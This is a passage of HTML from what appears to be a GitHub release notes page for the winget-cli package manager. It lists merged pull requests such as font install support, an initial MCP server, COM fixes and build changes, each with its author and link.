<li>Remove TestRelease by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3253760151" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5613" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5613/hovercard" href="https://github.com/microsoft/winget-cli/pull/5613">#5613</a></li>
<li>Handle Byte Order Mark during validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3220923892" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5585" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5585/hovercard" href="https://github.com/microsoft/winget-cli/pull/5585">#5585</a></li>
<li>Initial MCP Server implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3250446710" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5610" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5610/hovercard" href="https://github.com/microsoft/winget-cli/pull/5610">#5610</a></li>
<li>Update release notes for BOM Handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3264891691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5622" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5622/hovercard" href="https://github.com/microsoft/winget-cli/pull/5622">#5622</a></li>
<li>Don't build MCP for fuzzing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3267257548" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5625" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5625/hovercard" href="https://github.com/microsoft/winget-cli/pull/5625">#5625</a></li>
<li>Resolve nuget package graph for .NET projects together by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3274445183" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5627" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5627/hovercard" href="https://github.com/microsoft/winget-cli/pull/5627">#5627</a></li>
<li>Update to latest MCP nuget by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3284768501" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5633" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5633/hovercard" href="https://github.com/microsoft/winget-cli/pull/5633">#5633</a></li>
<li>Update release notes to mention WinUI dependency change by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3315786475" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5656" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5656/hovercard" href="https://github.com/microsoft/winget-cli/pull/5656">#5656</a></li>
<li>Improve COM server quiescing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3311253541" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5652" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5652/hovercard" href="https://github.com/microsoft/winget-cli/pull/5652">#5652</a></li>
<li>Improve issue forms &amp; add corresponding label triggers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mdanish-kh/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mdanish-kh">@mdanish-kh</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3319838802" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5661" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5661/hovercard" href="https://github.com/microsoft/winget-cli/pull/5661">#5661</a></li>
<li>Fix conflict with issue forms by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3320119960" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5663" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5663/hovercard" href="https://github.com/microsoft/winget-cli/pull/5663">#5663</a></li>
<li>Improve COM static store usage by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3346435528" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5680" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5680/hovercard" href="https://github.com/microsoft/winget-cli/pull/5680">#5680</a></li>
<li>Update schema to 1.12 with Font InstallerType by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3352674785" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5687" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5687/hovercard" href="https://github.com/microsoft/winget-cli/pull/5687">#5687</a></li>
<li>Download MS Store package for target OS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3353562454" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5689" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5689/hovercard" href="https://github.com/microsoft/winget-cli/pull/5689">#5689</a></li>
<li>Fixes for older OSes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3357315204" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5691" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5691/hovercard" href="https://github.com/microsoft/winget-cli/pull/5691">#5691</a></li>
<li>Add RestSource and tests for Manifest v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3360657592" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5695" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5695/hovercard" href="https://github.com/microsoft/winget-cli/pull/5695">#5695</a></li>
<li>Improve slow searches involving installed items by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3364993234" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5701" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5701/hovercard" href="https://github.com/microsoft/winget-cli/pull/5701">#5701</a></li>
<li>Shorter default installer log filename by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3368313385" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5705" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5705/hovercard" href="https://github.com/microsoft/winget-cli/pull/5705">#5705</a></li>
<li>Add the ARP correlation entry to the context for portable installs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3377690777" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5707" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5707/hovercard" href="https://github.com/microsoft/winget-cli/pull/5707">#5707</a></li>
<li>Fix two unrelated version issues by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3412285391" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5719" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5719/hovercard" href="https://github.com/microsoft/winget-cli/pull/5719">#5719</a></li>
<li>Heal tracking database if it can't open by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3419506355" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5724" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5724/hovercard" href="https://github.com/microsoft/winget-cli/pull/5724">#5724</a></li>
<li>MS Store cert pinning updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3436228691" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5732" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5732/hovercard" href="https://github.com/microsoft/winget-cli/pull/5732">#5732</a></li>
<li>Update MCP GP name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3446264966" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5736" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5736/hovercard" href="https://github.com/microsoft/winget-cli/pull/5736">#5736</a></li>
<li>Add workflow for automatic issue deduplication by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cinnamon-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cinnamon-msft">@cinnamon-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450208289" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5738" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5738/hovercard" href="https://github.com/microsoft/winget-cli/pull/5738">#5738</a></li>
<li>moving workflow to parent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/denelon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/denelon">@denelon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3450382277" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5740" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5740/hovercard" href="https://github.com/microsoft/winget-cli/pull/5740">#5740</a></li>
<li>Cache information responses from REST sources by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3424158468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5726" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5726/hovercard" href="https://github.com/microsoft/winget-cli/pull/5726">#5726</a></li>
<li>Shared build props by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3458857805" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5749" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5749/hovercard" href="https://github.com/microsoft/winget-cli/pull/5749">#5749</a></li>
<li>Improve shared props layout by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3459246168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5751" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5751/hovercard" href="https://github.com/microsoft/winget-cli/pull/5751">#5751</a></li>
<li>Fix portable path removal on upgrade by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3466370013" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5756" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5756/hovercard" href="https://github.com/microsoft/winget-cli/pull/5756">#5756</a></li>
<li>Minor update to release notes for v1.12 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3470589894" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5761" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5761/hovercard" href="https://github.com/microsoft/winget-cli/pull/5761">#5761</a></li>
<li>Font Install, Uninstall, additional Font List by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3187280381" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5566" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5566/hovercard" href="https://github.com/microsoft/winget-cli/pull/5566">#5566</a></li>
<li>Fix install source and final progress by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474726946" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5764" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5764/hovercard" href="https://github.com/microsoft/winget-cli/pull/5764">#5764</a></li>
<li>Use winrt for time conversion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3474607043" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5763" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5763/hovercard" href="https://github.com/microsoft/winget-cli/pull/5763">#5763</a></li>
<li>Change label_as_duplicate to false in workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3488439814" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5773" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5773/hovercard" href="https://github.com/microsoft/winget-cli/pull/5773">#5773</a></li>
<li>Remove openssl from sfsclient cgmanifest by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3489513239" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5775" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5775/hovercard" href="https://github.com/microsoft/winget-cli/pull/5775">#5775</a></li>
<li>Add admin check to uninstall of machine font by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3493108538" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5779" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5779/hovercard" href="https://github.com/microsoft/winget-cli/pull/5779">#5779</a></li>
<li>Add Font source group policy support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3302306142" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5646" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5646/hovercard" href="https://github.com/microsoft/winget-cli/pull/5646">#5646</a></li>
<li>Improve window thread termination by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3497595140" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5781" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5781/hovercard" href="https://github.com/microsoft/winget-cli/pull/5781">#5781</a></li>
<li>Fix portable installer issues when installing to non ascii path by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yao-msft/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yao-msft">@yao-msft</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500476031" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5788" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5788/hovercard" href="https://github.com/microsoft/winget-cli/pull/5788">#5788</a></li>
<li>Remove experimental from Font Install, Uninstall, and source by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dkbennett/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dkbennett">@dkbennett</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500835567" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5791" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5791/hovercard" href="https://github.com/microsoft/winget-cli/pull/5791">#5791</a></li>
<li>Update NOTICE by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3511592613" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5801" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5801/hovercard" href="https://github.com/microsoft/winget-cli/pull/5801">#5801</a></li>
<li>Update localized strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3514675035" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5805" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5805/hovercard" href="https://github.com/microsoft/winget-cli/pull/5805">#5805</a></li>
<li>Bump version to 1.28 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3500474102" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5787" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5787/hovercard" href="https://github.com/microsoft/winget-cli/pull/5787">#5787</a></li>
<li>Move to latest 7.4 PS SDK by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3519731252" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5811" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5811/hovercard" href="https://github.com/microsoft/winget-cli/pull/5811">#5811</a></li>
<li>Enable MultiProcessorCompilation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Trenly/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Trenly">@Trenly</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3512401468" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5804" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5804/hovercard" href="https://github.com/microsoft/winget-cli/pull/5804">#5804</a></li>
<li>Remove mention of WinGet Insider program from the README by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3558459633" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5832" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5832/hovercard" href="https://github.com/microsoft/winget-cli/pull/5832">#5832</a></li>
<li>Ignore ReleaseStatic outputs and clean intermediates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3572615072" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5848" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5848/hovercard" href="https://github.com/microsoft/winget-cli/pull/5848">#5848</a></li>
<li>Make Repair-WGPM a COM-aware cmdlet and rework version retrieval by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3568289044" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5842" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5842/hovercard" href="https://github.com/microsoft/winget-cli/pull/5842">#5842</a></li>
<li>Unregister signal handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3593025660" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5861" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5861/hovercard" href="https://github.com/microsoft/winget-cli/pull/5861">#5861</a></li>
<li>Support associating export units with packages in subdirectories of install location by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3588654688" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5859" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5859/hovercard" href="https://github.com/microsoft/winget-cli/pull/5859">#5859</a></li>
<li>Send host geo to sandbox by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3617875168" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5873" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5873/hovercard" href="https://github.com/microsoft/winget-cli/pull/5873">#5873</a></li>
<li>Update C++ nuget package references using new scripts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JohnMcPMS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JohnMcPMS">@JohnMcPMS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623390985" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5877" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5877/hovercard" href="https://github.com/microsoft/winget-cli/pull/5877">#5877</a></li>
<li>Update platform toolset by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/florelis/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/florelis">@florelis</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3627539923" data-permission-text="Title is private" data-url="https://github.com/microsoft/winget-cli/issues/5882" data-hovercard-type="pull_request" data-hovercard-url="/microsoft/winget-cli/pull/5882/hovercard" href="https://github.com/microsoft/winget-cli/pull/5882">#5882</a></li>
